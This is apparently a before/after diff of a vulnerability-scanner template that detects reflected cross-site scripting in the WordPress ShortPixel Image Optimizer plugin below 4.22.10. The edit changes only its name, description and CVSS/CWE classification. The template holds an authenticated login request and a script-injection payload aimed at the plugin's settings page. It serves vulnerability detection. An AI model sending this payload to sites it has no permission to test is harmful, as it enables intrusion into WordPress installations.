vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml (before)
id: shortpixel-image-optimizer-xss

info:
  name: ShortPixel Image Optimizer < 4.22.10 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01
    - https://wordpress.org/plugins/shortpixel-image-optimiser
  metadata:
    verified: true
  tags: shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/options-general.php?page=wp-shortpixel-settings&"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '&\"><script>alert(1)</script>&noheader=true&sp-action'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml (after)
id: shortpixel-image-optimizer-xss

info:
  name: WordPress ShortPixel Image Optimizer <4.22.10 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress ShortPixel Image Optimizer 4.22.10 does not escape generated URLs before outputting them back in an attribute, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01
    - https://wordpress.org/plugins/shortpixel-image-optimiser
  metadata:
    verified: true
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/options-general.php?page=wp-shortpixel-settings&"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '&\"><script>alert(1)</script>&noheader=true&sp-action'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml (diff)
@@ -1,15 +1,19 @@
 id: shortpixel-image-optimizer-xss
 
 info:
-  name: ShortPixel Image Optimizer < 4.22.10 - Reflected Cross-Site Scripting
+  name: WordPress ShortPixel Image Optimizer <4.22.10 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting.
+  description: WordPress ShortPixel Image Optimizer 4.22.10 does not escape generated URLs before outputting them back in an attribute, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01
     - https://wordpress.org/plugins/shortpixel-image-optimiser
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
